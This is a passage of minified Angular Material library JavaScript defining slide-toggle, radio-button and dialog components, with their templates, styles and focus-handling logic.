Tt,this.tabIndex=parseInt(r)||0,this.color=this.defaultColor=c.color||"accent",this._noopAnimations="NoopAnimations"===d,this.id=this._uniqueId=`${T}${++P1e}`}get required(){return this._required}set required(e){this._required=wi(e)}get checked(){return this._checked}set checked(e){this._checked=wi(e),this._changeDetectorRef.markForCheck()}get inputId(){return`${this.id||this._uniqueId}-input`}ngAfterContentInit(){this._focusMonitor.monitor(this._elementRef,!0).subscribe(e=>{"keyboard"===e||"program"===e?this._focused=!0:e||Promise.resolve().then(()=>{this._focused=!1,this._onTouched(),this._changeDetectorRef.markForCheck()})})}ngOnDestroy(){this._focusMonitor.stopMonitoring(this._elementRef)}writeValue(e){this.checked=!!e}registerOnChange(e){this._onChange=e}registerOnTouched(e){this._onTouched=e}setDisabledState(e){this.disabled=e,this._changeDetectorRef.markForCheck()}toggle(){this.checked=!this.checked,this._onChange(this.checked)}_emitChangeEvent(){this._onChange(this.checked),this.change.emit(this._createChangeEvent(this.checked))}}return t.\u0275fac=function(e){_d()},t.\u0275dir=Ot({type:t,inputs:{name:"name",id:"id",labelPosition:"labelPosition",ariaLabel:["aria-label","ariaLabel"],ariaLabelledby:["aria-labelledby","ariaLabelledby"],ariaDescribedby:["aria-describedby","ariaDescribedby"],required:"required",checked:"checked"},outputs:{change:"change",toggleChange:"toggleChange"},features:[ci]}),t})(),Mg=(()=>{class t extends z1e{constructor(e,i,n,r,c,d){super(e,i,n,r,c,d,"mat-slide-toggle-")}_createChangeEvent(e){return new N1e(this,e)}_onChangeEvent(e){e.stopPropagation(),this.toggleChange.emit(),this.defaults.disableToggleValue?this._inputElement.nativeElement.checked=this.checked:(this.checked=this._inputElement.nativeElement.checked,this._emitChangeEvent())}_onInputClick(e){e.stopPropagation()}focus(e,i){i?this._focusMonitor.focusVia(this._inputElement,i,e):this._inputElement.nativeElement.focus(e)}_onLabelTextChange(){this._changeDetectorRef.detectChanges()}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(js),Ee(Ma),Vr("tabindex"),Ee(k1e),Ee(ar,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-slide-toggle"]],viewQuery:function(e,i){if(1&e&&Mi(I1e,5),2&e){let n;Vt(n=Bt())&&(i._inputElement=n.first)}},hostAttrs:[1,"mat-slide-toggle"],hostVars:13,hostBindings:function(e,i){2&e&&(Gs("id",i.id),Rt("tabindex",null)("aria-label",null)("aria-labelledby",null)("name",null),Ct("mat-checked",i.checked)("mat-disabled",i.disabled)("mat-slide-toggle-label-before","before"==i.labelPosition)("_mat-animation-noopable",i._noopAnimations))},inputs:{disabled:"disabled",disableRipple:"disableRipple",color:"color",tabIndex:"tabIndex"},exportAs:["matSlideToggle"],features:[ki([O1e]),ci],ngContentSelectors:S1e,decls:14,vars:20,consts:[[1,"mat-slide-toggle-label"],["label",""],[1,"mat-slide-toggle-bar"],["type","checkbox","role","switch",1,"mat-slide-toggle-input","cdk-visually-hidden",3,"id","required","tabIndex","checked","disabled","change","click"],["input",""],[1,"mat-slide-toggle-thumb-container"],[1,"mat-slide-toggle-thumb"],["mat-ripple","",1,"mat-slide-toggle-ripple","mat-focus-indicator",3,"matRippleTrigger","matRippleDisabled","matRippleCentered","matRippleRadius","matRippleAnimation"],[1,"mat-ripple-element","mat-slide-toggle-persistent-ripple"],[1,"mat-slide-toggle-content",3,"cdkObserveContent"],["labelContent",""],[2,"display","none"]],template:function(e,i){if(1&e&&(Jn(),m(0,"label",0,1)(2,"span",2)(3,"input",3,4),he("change",function(r){return i._onChangeEvent(r)})("click",function(r){return i._onInputClick(r)}),u(),m(5,"span",5),it(6,"span",6),m(7,"span",7),it(8,"span",8),u()()(),m(9,"span",9,10),he("cdkObserveContent",function(){return i._onLabelTextChange()}),m(11,"span",11),s(12,"\xa0"),u(),va(13),u()()),2&e){const n=Ti(1),r=Ti(10);Rt("for",i.inputId),g(2),Ct("mat-slide-toggle-bar-no-side-margin",!r.textContent||!r.textContent.trim()),g(1),F("id",i.inputId)("required",i.required)("tabIndex",i.tabIndex)("checked",i.checked)("disabled",i.disabled),Rt("name",i.name)("aria-checked",i.checked)("aria-label",i.ariaLabel)("aria-labelledby",i.ariaLabelledby)("aria-describedby",i.ariaDescribedby),g(4),F("matRippleTrigger",n)("matRippleDisabled",i.disableRipple||i.disabled)("matRippleCentered",!0)("matRippleRadius",20)("matRippleAnimation",fr(18,R1e,i._noopAnimations?0:150))}},dependencies:[Dl,P3],styles:['.mat-slide-toggle{display:inline-block;height:24px;max-width:100%;line-height:24px;white-space:nowrap;outline:none;-webkit-tap-highlight-color:rgba(0,0,0,0)}.mat-slide-toggle.mat-checked .mat-slide-toggle-thumb-container{transform:translate3d(16px, 0, 0)}[dir=rtl] .mat-slide-toggle.mat-checked .mat-slide-toggle-thumb-container{transform:translate3d(-16px, 0, 0)}.mat-slide-toggle.mat-disabled{opacity:.38}.mat-slide-toggle.mat-disabled .mat-slide-toggle-label,.mat-slide-toggle.mat-disabled .mat-slide-toggle-thumb-container{cursor:default}.mat-slide-toggle-label{-webkit-user-select:none;user-select:none;display:flex;flex:1;flex-direction:row;align-items:center;height:inherit;cursor:pointer}.mat-slide-toggle-content{white-space:nowrap;overflow:hidden;text-overflow:ellipsis}.mat-slide-toggle-label-before .mat-slide-toggle-label{order:1}.mat-slide-toggle-label-before .mat-slide-toggle-bar{order:2}[dir=rtl] .mat-slide-toggle-label-before .mat-slide-toggle-bar,.mat-slide-toggle-bar{margin-right:8px;margin-left:0}[dir=rtl] .mat-slide-toggle-bar,.mat-slide-toggle-label-before .mat-slide-toggle-bar{margin-left:8px;margin-right:0}.mat-slide-toggle-bar-no-side-margin{margin-left:0;margin-right:0}.mat-slide-toggle-thumb-container{position:absolute;z-index:1;width:20px;height:20px;top:-3px;left:0;transform:translate3d(0, 0, 0);transition:all 80ms linear;transition-property:transform}._mat-animation-noopable .mat-slide-toggle-thumb-container{transition:none}[dir=rtl] .mat-slide-toggle-thumb-container{left:auto;right:0}.mat-slide-toggle-thumb{height:20px;width:20px;border-radius:50%;display:block}.mat-slide-toggle-bar{position:relative;width:36px;height:14px;flex-shrink:0;border-radius:8px}.mat-slide-toggle-input{bottom:0;left:10px}[dir=rtl] .mat-slide-toggle-input{left:auto;right:10px}.mat-slide-toggle-bar,.mat-slide-toggle-thumb{transition:all 80ms linear;transition-property:background-color;transition-delay:50ms}._mat-animation-noopable .mat-slide-toggle-bar,._mat-animation-noopable .mat-slide-toggle-thumb{transition:none}.mat-slide-toggle .mat-slide-toggle-ripple{position:absolute;top:calc(50% - 20px);left:calc(50% - 20px);height:40px;width:40px;z-index:1;pointer-events:none}.mat-slide-toggle .mat-slide-toggle-ripple .mat-ripple-element:not(.mat-slide-toggle-persistent-ripple){opacity:.12}.mat-slide-toggle-persistent-ripple{width:100%;height:100%;transform:none}.mat-slide-toggle-bar:hover .mat-slide-toggle-persistent-ripple{opacity:.04}.mat-slide-toggle:not(.mat-disabled).cdk-keyboard-focused .mat-slide-toggle-persistent-ripple{opacity:.12}.mat-slide-toggle-persistent-ripple,.mat-slide-toggle.mat-disabled .mat-slide-toggle-bar:hover .mat-slide-toggle-persistent-ripple{opacity:0}@media(hover: none){.mat-slide-toggle-bar:hover .mat-slide-toggle-persistent-ripple{display:none}}.mat-slide-toggle-input:focus~.mat-slide-toggle-thumb-container .mat-focus-indicator::before{content:""}.cdk-high-contrast-active .mat-slide-toggle-thumb,.cdk-high-contrast-active .mat-slide-toggle-bar{border:1px solid}'],encapsulation:2,changeDetection:0}),t})(),iV=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})(),aV=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[iV,Od,la,$y,iV,la]}),t})();const V1e=["input"],B1e=function(t){return{enterDuration:t}},H1e=["*"],U1e=new ni("mat-radio-default-options",{providedIn:"root",factory:function q1e(){return{color:"accent"}}});let nV=0;const G1e={provide:Ls,useExisting:ja(()=>sV),multi:!0};class oV{constructor(a,e){this.source=a,this.value=e}}const rV=new ni("MatRadioGroup");let j1e=(()=>{class t{constructor(e){this._changeDetector=e,this._value=null,this._name="mat-radio-group-"+nV++,this._selected=null,this._isInitialized=!1,this._labelPosition="after",this._disabled=!1,this._required=!1,this._controlValueAccessorChangeFn=()=>{},this.onTouched=()=>{},this.change=new Tt}get name(){return this._name}set name(e){this._name=e,this._updateRadioButtonNames()}get labelPosition(){return this._labelPosition}set labelPosition(e){this._labelPosition="before"===e?"before":"after",this._markRadiosForCheck()}get value(){return this._value}set value(e){this._value!==e&&(this._value=e,this._updateSelectedRadioFromValue(),this._checkSelectedRadioButton())}_checkSelectedRadioButton(){this._selected&&!this._selected.checked&&(this._selected.checked=!0)}get selected(){return this._selected}set selected(e){this._selected=e,this.value=e?e.value:null,this._checkSelectedRadioButton()}get disabled(){return this._disabled}set disabled(e){this._disabled=wi(e),this._markRadiosForCheck()}get required(){return this._required}set required(e){this._required=wi(e),this._markRadiosForCheck()}ngAfterContentInit(){this._isInitialized=!0}_touch(){this.onTouched&&this.onTouched()}_updateRadioButtonNames(){this._radios&&this._radios.forEach(e=>{e.name=this.name,e._markForCheck()})}_updateSelectedRadioFromValue(){this._radios&&(null===this._selected||this._selected.value!==this._value)&&(this._selected=null,this._radios.forEach(i=>{i.checked=this.value===i.value,i.checked&&(this._selected=i)}))}_emitChangeEvent(){this._isInitialized&&this.change.emit(new oV(this._selected,this._value))}_markRadiosForCheck(){this._radios&&this._radios.forEach(e=>e._markForCheck())}writeValue(e){this.value=e,this._changeDetector.markForCheck()}registerOnChange(e){this._controlValueAccessorChangeFn=e}registerOnTouched(e){this.onTouched=e}setDisabledState(e){this.disabled=e,this._changeDetector.markForCheck()}}return t.\u0275fac=function(e){return new(e||t)(Ee(Ma))},t.\u0275dir=Ot({type:t,inputs:{color:"color",name:"name",labelPosition:"labelPosition",value:"value",selected:"selected",disabled:"disabled",required:"required"},outputs:{change:"change"}}),t})(),sV=(()=>{class t extends j1e{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["mat-radio-group"]],contentQueries:function(e,i,n){if(1&e&&fa(n,cV,5),2&e){let r;Vt(r=Bt())&&(i._radios=r)}},hostAttrs:["role","radiogroup",1,"mat-radio-group"],exportAs:["matRadioGroup"],features:[ki([G1e,{provide:rV,useExisting:t}]),ci]}),t})();class Q1e{constructor(a){this._elementRef=a}}const $1e=El(dp(Q1e));let K1e=(()=>{class t extends $1e{constructor(e,i,n,r,c,d,T,k){super(i),this._changeDetector=n,this._focusMonitor=r,this._radioDispatcher=c,this._providerOverride=T,this._uniqueId="mat-radio-"+ ++nV,this.id=this._uniqueId,this.change=new Tt,this._checked=!1,this._value=null,this._removeUniqueSelectionListener=()=>{},this.radioGroup=e,this._noopAnimations="NoopAnimations"===d,k&&(this.tabIndex=Uo(k,0)),this._removeUniqueSelectionListener=c.listen((q,Y)=>{q!==this.id&&Y===this.name&&(this.checked=!1)})}get checked(){return this._checked}set checked(e){const i=wi(e);this._checked!==i&&(this._checked=i,i&&this.radioGroup&&this.radioGroup.value!==this.value?this.radioGroup.selected=this:!i&&this.radioGroup&&this.radioGroup.value===this.value&&(this.radioGroup.selected=null),i&&this._radioDispatcher.notify(this.id,this.name),this._changeDetector.markForCheck())}get value(){return this._value}set value(e){this._value!==e&&(this._value=e,null!==this.radioGroup&&(this.checked||(this.checked=this.radioGroup.value===e),this.checked&&(this.radioGroup.selected=this)))}get labelPosition(){return this._labelPosition||this.radioGroup&&this.radioGroup.labelPosition||"after"}set labelPosition(e){this._labelPosition=e}get disabled(){return this._disabled||null!==this.radioGroup&&this.radioGroup.disabled}set disabled(e){this._setDisabled(wi(e))}get required(){return this._required||this.radioGroup&&this.radioGroup.required}set required(e){this._required=wi(e)}get color(){return this._color||this.radioGroup&&this.radioGroup.color||this._providerOverride&&this._providerOverride.color||"accent"}set color(e){this._color=e}get inputId(){return`${this.id||this._uniqueId}-input`}focus(e,i){i?this._focusMonitor.focusVia(this._inputElement,i,e):this._inputElement.nativeElement.focus(e)}_markForCheck(){this._changeDetector.markForCheck()}ngOnInit(){this.radioGroup&&(this.checked=this.radioGroup.value===this._value,this.checked&&(this.radioGroup.selected=this),this.name=this.radioGroup.name)}ngDoCheck(){this._updateTabIndex()}ngAfterViewInit(){this._updateTabIndex(),this._focusMonitor.monitor(this._elementRef,!0).subscribe(e=>{!e&&this.radioGroup&&this.radioGroup._touch()})}ngOnDestroy(){this._focusMonitor.stopMonitoring(this._elementRef),this._removeUniqueSelectionListener()}_emitChangeEvent(){this.change.emit(new oV(this,this._value))}_isRippleDisabled(){return this.disableRipple||this.disabled}_onInputClick(e){e.stopPropagation()}_onInputInteraction(e){if(e.stopPropagation(),!this.checked&&!this.disabled){const i=this.radioGroup&&this.value!==this.radioGroup.value;this.checked=!0,this._emitChangeEvent(),this.radioGroup&&(this.radioGroup._controlValueAccessorChangeFn(this.value),i&&this.radioGroup._emitChangeEvent())}}_setDisabled(e){this._disabled!==e&&(this._disabled=e,this._changeDetector.markForCheck())}_updateTabIndex(){var e;const i=this.radioGroup;let n;if(n=i&&i.selected&&!this.disabled?i.selected===this?this.tabIndex:-1:this.tabIndex,n!==this._previousTabIndex){const r=null===(e=this._inputElement)||void 0===e?void 0:e.nativeElement;r&&(r.setAttribute("tabindex",n+""),this._previousTabIndex=n)}}}return t.\u0275fac=function(e){_d()},t.\u0275dir=Ot({type:t,viewQuery:function(e,i){if(1&e&&Mi(V1e,5),2&e){let n;Vt(n=Bt())&&(i._inputElement=n.first)}},inputs:{id:"id",name:"name",ariaLabel:["aria-label","ariaLabel"],ariaLabelledby:["aria-labelledby","ariaLabelledby"],ariaDescribedby:["aria-describedby","ariaDescribedby"],checked:"checked",value:"value",labelPosition:"labelPosition",disabled:"disabled",required:"required",color:"color"},outputs:{change:"change"},features:[ci]}),t})(),cV=(()=>{class t extends K1e{constructor(e,i,n,r,c,d,T,k){super(e,i,n,r,c,d,T,k)}}return t.\u0275fac=function(e){return new(e||t)(Ee(rV,8),Ee(mi),Ee(Ma),Ee(js),Ee(aw),Ee(ar,8),Ee(U1e,8),Vr("tabindex"))},t.\u0275cmp=Wt({type:t,selectors:[["mat-radio-button"]],hostAttrs:[1,"mat-radio-button"],hostVars:17,hostBindings:function(e,i){1&e&&he("focus",function(){return i._inputElement.nativeElement.focus()}),2&e&&(Rt("tabindex",null)("id",i.id)("aria-label",null)("aria-labelledby",null)("aria-describedby",null),Ct("mat-radio-checked",i.checked)("mat-radio-disabled",i.disabled)("_mat-animation-noopable",i._noopAnimations)("mat-primary","primary"===i.color)("mat-accent","accent"===i.color)("mat-warn","warn"===i.color))},inputs:{disableRipple:"disableRipple",tabIndex:"tabIndex"},exportAs:["matRadioButton"],features:[ci],ngContentSelectors:H1e,decls:13,vars:19,consts:[[1,"mat-radio-label"],["label",""],[1,"mat-radio-container"],[1,"mat-radio-outer-circle"],[1,"mat-radio-inner-circle"],["type","radio",1,"mat-radio-input",3,"id","checked","disabled","required","change","click"],["input",""],["mat-ripple","",1,"mat-radio-ripple","mat-focus-indicator",3,"matRippleTrigger","matRippleDisabled","matRippleCentered","matRippleRadius","matRippleAnimation"],[1,"mat-ripple-element","mat-radio-persistent-ripple"],[1,"mat-radio-label-content"],[2,"display","none"]],template:function(e,i){if(1&e&&(Jn(),m(0,"label",0,1)(2,"span",2),it(3,"span",3)(4,"span",4),m(5,"input",5,6),he("change",function(r){return i._onInputInteraction(r)})("click",function(r){return i._onInputClick(r)}),u(),m(7,"span",7),it(8,"span",8),u()(),m(9,"span",9)(10,"span",10),s(11,"\xa0"),u(),va(12),u()()),2&e){const n=Ti(1);Rt("for",i.inputId),g(5),F("id",i.inputId)("checked",i.checked)("disabled",i.disabled)("required",i.required),Rt("name",i.name)("value",i.value)("aria-label",i.ariaLabel)("aria-labelledby",i.ariaLabelledby)("aria-describedby",i.ariaDescribedby),g(2),F("matRippleTrigger",n)("matRippleDisabled",i._isRippleDisabled())("matRippleCentered",!0)("matRippleRadius",20)("matRippleAnimation",fr(17,B1e,i._noopAnimations?0:150)),g(2),Ct("mat-radio-label-before","before"==i.labelPosition)}},dependencies:[Dl],styles:['.mat-radio-button{display:inline-block;-webkit-tap-highlight-color:rgba(0,0,0,0);outline:0}.mat-radio-label{-webkit-user-select:none;user-select:none;cursor:pointer;display:inline-flex;align-items:center;white-space:nowrap;vertical-align:middle;width:100%}.mat-radio-container{box-sizing:border-box;display:inline-block;position:relative;width:20px;height:20px;flex-shrink:0}.mat-radio-outer-circle{box-sizing:border-box;display:block;height:20px;left:0;position:absolute;top:0;transition:border-color ease 280ms;width:20px;border-width:2px;border-style:solid;border-radius:50%}._mat-animation-noopable .mat-radio-outer-circle{transition:none}.mat-radio-inner-circle{border-radius:50%;box-sizing:border-box;display:block;height:20px;left:0;position:absolute;top:0;opacity:0;transition:transform ease 280ms,background-color ease 280ms,opacity linear 1ms 280ms;width:20px;transform:scale(0.001);-webkit-print-color-adjust:exact;color-adjust:exact}.mat-radio-checked .mat-radio-inner-circle{transform:scale(0.5);opacity:1;transition:transform ease 280ms,background-color ease 280ms}.cdk-high-contrast-active .mat-radio-checked .mat-radio-inner-circle{border:solid 10px}._mat-animation-noopable .mat-radio-inner-circle{transition:none}.mat-radio-label-content{-webkit-user-select:auto;user-select:auto;display:inline-block;order:0;line-height:inherit;padding-left:8px;padding-right:0}[dir=rtl] .mat-radio-label-content{padding-right:8px;padding-left:0}.mat-radio-label-content.mat-radio-label-before{order:-1;padding-left:0;padding-right:8px}[dir=rtl] .mat-radio-label-content.mat-radio-label-before{padding-right:0;padding-left:8px}.mat-radio-disabled,.mat-radio-disabled .mat-radio-label{cursor:default}.mat-radio-button .mat-radio-ripple{position:absolute;left:calc(50% - 20px);top:calc(50% - 20px);height:40px;width:40px;z-index:1;pointer-events:none}.mat-radio-button .mat-radio-ripple .mat-ripple-element:not(.mat-radio-persistent-ripple){opacity:.16}.mat-radio-persistent-ripple{width:100%;height:100%;transform:none;top:0;left:0}.mat-radio-container:hover .mat-radio-persistent-ripple{opacity:.04}.mat-radio-button:not(.mat-radio-disabled).cdk-keyboard-focused .mat-radio-persistent-ripple,.mat-radio-button:not(.mat-radio-disabled).cdk-program-focused .mat-radio-persistent-ripple{opacity:.12}.mat-radio-persistent-ripple,.mat-radio-disabled .mat-radio-container:hover .mat-radio-persistent-ripple{opacity:0}@media(hover: none){.mat-radio-container:hover .mat-radio-persistent-ripple{display:none}}.mat-radio-input{opacity:0;position:absolute;top:0;left:0;margin:0;width:100%;height:100%;cursor:inherit;z-index:-1}.mat-radio-input:focus~.mat-focus-indicator::before{content:""}.cdk-high-contrast-active .mat-radio-disabled{opacity:.5}'],encapsulation:2,changeDetection:0}),t})(),_8=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[Od,la,la]}),t})();function X1e(t,a){}class oA{constructor(){this.role="dialog",this.panelClass="",this.hasBackdrop=!0,this.backdropClass="",this.disableClose=!1,this.width="",this.height="",this.data=null,this.ariaDescribedBy=null,this.ariaLabelledBy=null,this.ariaLabel=null,this.ariaModal=!0,this.autoFocus="first-tabbable",this.restoreFocus=!0,this.closeOnNavigation=!0,this.closeOnDestroy=!0}}let lV=(()=>{class t extends eA{constructor(e,i,n,r,c,d,T,k){super(),this._elementRef=e,this._focusTrapFactory=i,this._config=r,this._interactivityChecker=c,this._ngZone=d,this._overlayRef=T,this._focusMonitor=k,this._elementFocusedBeforeDialogWasOpened=null,this._closeInteractionType=null,this.attachDomPortal=q=>{this._portalOutlet.hasAttached();const Y=this._portalOutlet.attachDomPortal(q);return this._contentAttached(),Y},this._ariaLabelledBy=this._config.ariaLabelledBy||null,this._document=n}_contentAttached(){this._initializeFocusTrap(),this._handleBackdropClicks(),this._captureInitialFocus()}_captureInitialFocus(){this._trapFocus()}ngOnDestroy(){this._restoreFocus()}attachComponentPortal(e){this._portalOutlet.hasAttached();const i=this._portalOutlet.attachComponentPortal(e);return this._contentAttached(),i}attachTemplatePortal(e){this._portalOutlet.hasAttached();const i=this._portalOutlet.attachTemplatePortal(e);return this._contentAttached(),i}_recaptureFocus(){this._containsFocus()||this._trapFocus()}_forceFocus(e,i){this._interactivityChecker.isFocusable(e)||(e.tabIndex=-1,this._ngZone.runOutsideAngular(()=>{const n=()=>{e.removeEventListener("blur",n),e.removeEventListener("mousedown",n),e.removeAttribute("tabindex")};e.addEventListener("blur",n),e.addEventListener("mousedown",n)})),e.focus(i)}_focusByCssSelector(e,i){let n=this._elementRef.nativeElement.querySelector(e);n&&this._forceFocus(n,i)}_trapFocus(){const e=this._elementRef.nativeElement;switch(this._config.autoFocus){case!1:case"dialog":this._containsFocus()||e.focus();break;case!0:case"first-tabbable":this._focusTrap.focusInitialElementWhenReady().then(i=>{i||this._focusDialogContainer()});break;case"first-heading":this._focusByCssSelector('h1, h2, h3, h4, h5, h6, [role="heading"]');break;default:this._focusByCssSelector(this._config.autoFocus)}}_restoreFocus(){const e=this._config.restoreFocus;let i=null;if("string"==typeof e?i=this._document.querySelector(e):"boolean"==typeof e?i=e?this._elementFocusedBeforeDialogWasOpened:null:e&&(i=e),this._config.restoreFocus&&i&&"function"==typeof i.focus){const n=g3(),r=this._elementRef.nativeElement;(!n||n===this._document.body||n===r||r.contains(n))&&(this._focusMonitor?(this._focusMonitor.focusVia(i,this._closeInteractionType),this._closeInteractionType=null):i.focus())}this._focusTrap&&this._focusTrap.destroy()}_focusDialogContainer(){this._elementRef.nativeElement.focus&&this._elementRef.nativeElement.focus()}_containsFocus(){const e=this._elementRef.nativeElement,i=g3();return e===i||e.contains(i)}_initializeFocusTrap(){this._focusTrap=this._focusTrapFactory.create(this._elementRef.nativeElement),this._document&&(this._elementFocusedBeforeDialogWasOpened=g3())}_handleBackdropClicks(){this._overlayRef.backdropClick().subscribe(()=>{this._config.disableClose&&this._recaptureFocus()})}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(z3),Ee(ga,8),Ee(oA),Ee(Ky),Ee(qi),Ee(nb),Ee(js))},t.\u0275cmp=Wt({type:t,selectors:[["cdk-dialog-container"]],viewQuery:function(e,i){if(1&e&&Mi(Cu,7),2&e){let n;Vt(n=Bt())&&(i._portalOutlet=n.first)}},hostAttrs:["tabindex","-1",1,"cdk-dialog-container"],hostVars:6,hostBindings:function(e,i){2&e&&Rt("id",i._config.id||null)("role",i._config.role)("aria-modal",i._config.ariaModal)("aria-labelledby",i._config.ariaLabel?null:i._ariaLabelledBy)("aria-label",i._config.ariaLabel)("aria-describedby",i._config.ariaDescribedBy||null)},features:[ci],decls:1,vars:0,consts:[["cdkPortalOutlet",""]],template:function(e,i){1&e&&ne(0,X1e,0,0,"ng-template",0)},dependencies:[Cu],styles:[".cdk-dialog-container{display:block;width:100%;height:100%;min-height:inherit;max-height:inherit}"],encapsulation:2}),t})();class g8{constructor(a,e){this.overlayRef=a,this.config=e,this.closed=new J,this.disableClose=e.disableClose,this.backdropClick=a.backdropClick(),this.keydownEvents=a.keydownEvents(),this.outsidePointerEvents=a.outsidePointerEvents(),this.id=e.id,this.keydownEvents.subscribe(i=>{27===i.keyCode&&!this.disableClose&&!es(i)&&(i.preventDefault(),this.close(void 0,{focusOrigin:"keyboard"}))}),this.backdropClick.subscribe(()=>{this.disableClose||this.close(void 0,{focusOrigin:"mouse"})})}close(a,e){if(this.containerInstance){const i=this.closed;this.containerInstance._closeInteractionType=(null==e?void 0:e.focusOrigin)||"program",this.overlayRef.dispose(),i.next(a),i.complete(),this.componentInstance=this.containerInstance=null}}updatePosition(){return this.overlayRef.updatePosition(),this}updateSize(a="",e=""){return this.overlayRef.updateSize({width:a,height:e}),this}addPanelClass(a){return this.overlayRef.addPanelClass(a),this}removePanelClass(a){return this.overlayRef.removePanelClass(a),this}}const dV=new ni("DialogScrollStrategy"),Y1e=new ni("DialogData"),J1e=new ni("DefaultDialogConfig"),e2e={provide:dV,deps:[As],useFactory:function Z1e(t){return()=>t.scrollStrategies.block()}};let t2e=0,mV=(()=>{class t{constructor(e,i,n,r,c,d){this._overlay=e,this._injector=i,this._defaultOptions=n,this._parentDialog=r,this._overlayContainer=c,this._openDialogsAtThisLevel=[],this._afterAllClosedAtThisLevel=new J,this._afterOpenedAtThisLevel=new J,this._ariaHiddenElements=new Map,this.afterAllClosed=rp(()=>this.openDialogs.length?this._getAfterAllClosed():this._getAfterAllClosed().pipe(Ro(void 0))),this._scrollStrategy=d}get openDialogs(){return this._parentDialog?this._parentDialog.openDialogs:this._openDialogsAtThisLevel}get afterOpened(){return this._parentDialog?this._parentDialog.afterOpened:this._afterOpenedAtThisLevel}open(e,i){const n=this._defaultOptions||new oA;(i=Object.assign(Object.assign({},n),i)).id=i.id||"cdk-dialog-"+t2e++,i.id&&this.getDialogById(i.id);const r=this._getOverlayConfig(i),c=this._overlay.create(r),d=new g8(c,i),T=this._attachContainer(c,d,i);return d.containerInstance=T,this._attachDialogContent(e,d,T,i),this.openDialogs.length||this._hideNonDialogContentFromAssistiveTechnology(),this.openDialogs.push(d),d.closed.subscribe(()=>this._removeOpenDialog(d,!0)),this.afterOpened.next(d),d}closeAll(){C8(this.openDialogs,e=>e.close())}getDialogById(e){return this.openDialogs.find(i=>i.id===e)}ngOnDestroy(){C8(this._openDialogsAtThisLevel,e=>{!1===e.config.closeOnDestroy&&this._removeOpenDialog(e,!1)}),C8(this._openDialogsAtThisLevel,e=>e.close()),this._afterAllClosedAtThisLevel.complete(),this._afterOpenedAtThisLevel.complete(),this._openDialogsAtThisLevel=[]}_getOverlayConfig(e){const i=new yg({positionStrategy:e.positionStrategy||this._overlay.position().global().centerHorizontally().centerVertically(),scrollStrategy:e.scrollStrategy||this._scrollStrategy(),panelClass:e.panelClass,hasBackdrop:e.hasBackdrop,direction:e.direction,minWidth:e.minWidth,minHeight:e.minHeight,maxWidth:e.maxWidth,maxHeight:e.maxHeight,width:e.width,height:e.height,disposeOnNavigation:e.closeOnNavigation});return e.backdropClass&&(i.backdropClass=e.backdropClass),i}_attachContainer(e,i,n){var r;const c=n.injector||(null===(r=n.viewContainerRef)||void 0===r?void 0:r.injector),d=[{provide:oA,useValue:n},{provide:g8,useValue:i},{provide:nb,useValue:e}];let T;n.container?"function"==typeof n.container?T=n.container:(T=n.container.type,d.push(...n.container.providers(n))):T=lV;const k=new hp(T,n.viewContainerRef,Ko.create({parent:c||this._injector,providers:d}),n.componentFactoryResolver);return e.attach(k).instance}_attachDialogContent(e,i,n,r){if(e instanceof ho){const c=this._createInjector(r,i,n,void 0);let d={$implicit:r.data,dialogRef:i};r.templateContext&&(d=Object.assign(Object.assign({},d),"function"==typeof r.templateContext?r.templateContext():r.templateContext)),n.attachTemplatePortal(new Mm(e,null,d,c))}else{const c=this._createInjector(r,i,n,this._injector),d=n.attachComponentPortal(new hp(e,r.viewContainerRef,c,r.componentFactoryResolver));i.componentInstance=d.instance}}_createInjector(e,i,n,r){var c;const d=e.injector||(null===(c=e.viewContainerRef)||void 0===c?void 0:c.injector),T=[{provide:Y1e,useValue:e.data},{provide:g8,useValue:i}];return e.providers&&("function"==typeof e.providers?T.push(...e.providers(i,e,n)):T.push(...e.providers)),e.direction&&(!d||!d.get(Cr,null,Da.Optional))&&T.push({provide:Cr,useValue:{value:e.direction,change:Bi()}}),Ko.create({parent:d||r,providers:T})}_removeOpenDialog(e,i){const n=this.openDialogs.indexOf(e);n>-1&&(this.openDialogs.splice(n,1),this.openDialogs.length||(this._ariaHiddenElements.forEach((r,c)=>{r?c.setAttribute("aria-hidden",r):c.removeAttribute("aria-hidden")}),this._ariaHiddenElements.clear(),i&&this._getAfterAllClosed().next()))}_hideNonDialogContentFromAssistiveTechnology(){const e=this._overlayContainer.getContainerElement();if(e.parentElement){const i=e.parentElement.children;for(let n=i.length-1;n>-1;n--){const r=i[n];r!==e&&"SCRIPT"!==r.nodeName&&"STYLE"!==r.nodeName&&!r.hasAttribute("aria-live")&&(this._ariaHiddenElements.set(r,r.getAttribute("aria-hidden")),r.setAttribute("aria-hidden","true"))}}}_getAfterAllClosed(){const e=this._parentDialog;return e?e._getAfterAllClosed():this._afterAllClosedAtThisLevel}}return t.\u0275fac=function(e){return new(e||t)(At(As),At(Ko),At(J1e,8),At(t,12),At(ob),At(dV))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();function C8(t,a){let e=t.length;for(;e--;)a(t[e])}let i2e=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[mV,e2e],imports:[bu,yu,Xy,yu]}),t})();function a2e(t,a){}const B1={params:{enterAnimationDuration:"150ms",exitAnimationDuration:"75ms"}},n2e={dialogContainer:nr("dialogContainer",[sn("void, exit",zi({opacity:0,transform:"scale(0.7)"})),sn("enter",zi({transform:"none"})),gn("* => enter",$P([En("{{enterAnimationDuration}} cubic-bezier(0, 0, 0.2, 1)",zi({transform:"none",opacity:1})),c4("@*",s4(),{optional:!0})]),B1),gn("* => void, * => exit",$P([En("{{exitAnimationDuration}} cubic-bezier(0.4, 0.0, 0.2, 1)",zi({opacity:0})),c4("@*",s4(),{optional:!0})]),B1)])};class 